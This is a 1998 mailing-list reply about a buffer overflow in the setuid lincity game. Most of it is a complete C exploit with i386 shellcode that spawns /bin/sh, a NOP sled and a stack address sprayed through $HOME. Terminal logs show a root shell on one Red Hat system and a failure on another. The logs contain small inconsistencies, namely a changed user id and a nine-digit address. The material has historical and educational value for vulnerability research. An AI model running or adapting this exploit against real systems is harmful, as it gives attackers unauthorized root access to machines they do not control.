Re: Lincity Buffer Overflow

bst@INAME.COM
Tue, 17 Mar 1998 10:12:44 -0400

In reply to TFreak's answer:

I think IT IS dangerous. Observe:

First, the host program (the exploit itself):
--------------------------- lincityxpl.c ---------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the BOF= payload (the address spray that is exported as $HOME). */
#define HOMESIZE 500
/* Size of the EGG= payload (NOP sled followed by the shellcode); "huevo" = egg. */
#define HUEVOSIZE 5000

/*
 * Linux/x86 (i386) shellcode.  The bytes decode as: jmp/call pair to get
 * the address of "/bin/sh" into %esi; store that pointer at +0xb and a zero
 * at +0x7 and +0xf to terminate the string and build argv/envp; set
 * %eax = 0x1234561b ^ 0x12345610 = 11 (execve) without emitting a NUL byte;
 * int 0x80; then xor %eax,%eax / inc %eax / int 0x80 (exit).  No byte is
 * 0x00, so the strlen() in main() measures the whole stub.
 */
char *shell =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

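/*
 * esp - return this process's stack pointer.
 *
 * The value is used as the guess for where the target's stack (and so the
 * EGG environment string) will sit.  Only meaningful on 32-bit x86 Linux:
 * the asm reads %esp and the shellcode is i386 code.
 *
 * The original fell off the end of a non-void function and relied on %eax
 * still holding the moved value (undefined behaviour); this version uses
 * an output operand and an explicit return, which yields the same value.
 */
long
esp(void)
{
	unsigned int sp;	/* 32-bit, matching the movl; the whole register on i386 */

	__asm__("movl %%esp,%0" : "=r"(sp));
	return sp;
}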
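/*
 * main - build the two environment payloads and launch the setuid lincity
 * binary with $HOME pointing at the overflow string.
 *
 *   BOF=  HOMESIZE bytes: repeated copies of a guessed stack address,
 *         exported as $HOME so the target overflows while handling it.
 *   EGG=  HUEVOSIZE bytes: NOP sled followed by the shellcode, placed in
 *         the target's environment so the guessed address lands inside it.
 *
 * The guess is this process's own stack pointer, so the PoC only works when
 * the target's stack layout is predictable from ours (same architecture,
 * no stack randomisation).  The target path is hard-coded.
 *
 * Exits with status 1 if either allocation fails; otherwise returns 0 after
 * system() returns.  (The listing as circulated had a stray second copy of
 * esp()/main() pasted inside this function; that is removed here.)
 */
int
main(void)
{
	char *ptr, *bof, *egg;
	long *addr_ptr, addr;
	size_t i, shell_len;

	if (!(bof = malloc(HOMESIZE))) {
		printf("NoMoreMemory4bof.\n");
		exit(1);
	}

	if (!(egg = malloc(HUEVOSIZE))) {
		printf("NoMoreMemory4egg.\n");
		exit(1);
	}

	addr = esp();

	/*
	 * Spray the address over BOF.  Step by sizeof addr rather than a
	 * literal 4 so the loop cannot run past the buffer if long is wider
	 * than 4 bytes.  The "BOF=" prefix written below is 4 bytes, so the
	 * string putenv() sees starts on a long boundary on i386.
	 */
	addr_ptr = (long *) bof;
	for (i = 0; i + sizeof addr <= HOMESIZE; i += sizeof addr)
		*(addr_ptr++) = addr;

	/*
	 * NOP sled: everything except the shellcode and the terminating NUL,
	 * i.e. HUEVOSIZE - shell_len - 1 bytes (the same count as the
	 * original "i <= HUEVOSIZE - strlen(shell) - 2" loop).
	 */
	shell_len = strlen(shell);
	ptr = egg;
	for (i = 0; i < HUEVOSIZE - shell_len - 1; i++)
		*(ptr++) = 0x90;

	memcpy(ptr, shell, shell_len);

	/* addr is a long; the original's %x was a format-specifier mismatch. */
	printf("Address:\t0x%lx\n", addr);

	/* Both strings must be NUL-terminated before they go to putenv(). */
	bof[HOMESIZE - 1] = '\0';
	egg[HUEVOSIZE - 1] = '\0';

	/* Overwrite the first four bytes with the NAME= prefix putenv() needs. */
	memcpy(bof, "BOF=", 4);
	memcpy(egg, "EGG=", 4);

	/* putenv() keeps the pointers themselves, so bof/egg are never freed. */
	putenv(bof);
	putenv(egg);

	/* $BOF is expanded by the shell into the target's $HOME. */
	system("export HOME=$BOF; /usr/games/lincity");

	return 0;
}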
-----------------------------------------------------------------------

System #1:
~~~~~~~~~~

$ cat /etc/redhat-release
release 4.1 (Vanderbilt)
$ uname -a
Linux System1 2.0.29 #3 Thu Jun 5 16:37:15 ARST 1997 i486
$ ls -la /usr/games/lincity
-rwsr-sr-x 1 root linux 793395 Mar 17 07:16 /usr/games/lincity
$ ldd /usr/games/lincity
libvgagl.so.1 => /usr/lib/libvgagl.so.1.2.10
libvga.so.1 => /usr/lib/libvga.so.1.2.10
libg++.so.27 => /usr/lib/libg++.so.27.1.4
libstdc++.so.27 => /usr/lib/libstdc++.so.27.1.4
libm.so.5 => /lib/libm.so.5.0.6
libc.so.5 => /lib/libc.so.5.3.12
$ cc -o fl lincityxpl.c
$ id
uid=500(bst) gid=500(bst) groups=500(bst)
$ ./fl
Address: 0xbffffd4c
bash# id
uid=500(bst) gid=500(bst) euid=0(root) egid=0(linux) groups=500(bst)
bash#

System #2:
~~~~~~~~~~

$ cat /etc/redhat-release
release 4.2 (Biltmore)
$ uname -a
Linux System2 2.0.33 #4 Thu Jan 15 08:49:37 GMT 1998 i586 unknown
$ ls -la /usr/games/lincity
-rwsr-sr-x 1 root root 794612 Mar 17 09:22 /usr/games/lincity
$ ldd /usr/games/lincity
libvgagl.so.1 => /usr/lib/libvgagl.so.1 (0x4000a000)
libvga.so.1 => /usr/lib/libvga.so.1 (0x40017000)
libg++.so.27 => /usr/lib/libg++.so.27 (0x40046000)
libstdc++.so.27 => /usr/lib/libstdc++.so.27 (0x40079000)
libm.so.5 => /lib/libm.so.5 (0x400a8000)
libc.so.5 => /lib/libc.so.5 (0x400b0000)
$ id
uid=501(rewt) gid=502(rewt) groups=100(users),502(rewt)
$ ls -la /usr/lib/libsvga*.so.*
-rwxr-xr-x 1 root bin 182356 Sep 2 1996 /usr/lib/libvga.so.1.2.10
-rwxr-xr-x 1 root bin 46548 Sep 2 1996 /usr/lib/libvgagl.so.1.2.10
$ cc -o fl lincityxpl.c
$ id
uid=500(bst) gid=500(bst) groups=500(bst)
$ ./fl
Address: 0xbffffdd2f
sh-2.01$ id
uid=500(bst) gid=500(bst) groups=500(bst)

Well, as you can see, the *vga* libs are the same on both systems, yet the exploit only yields a root shell on System #1 (euid=0 in the `id` output), while on System #2 it drops into an unprivileged sh.
Please mail me your conclusions.

Bst.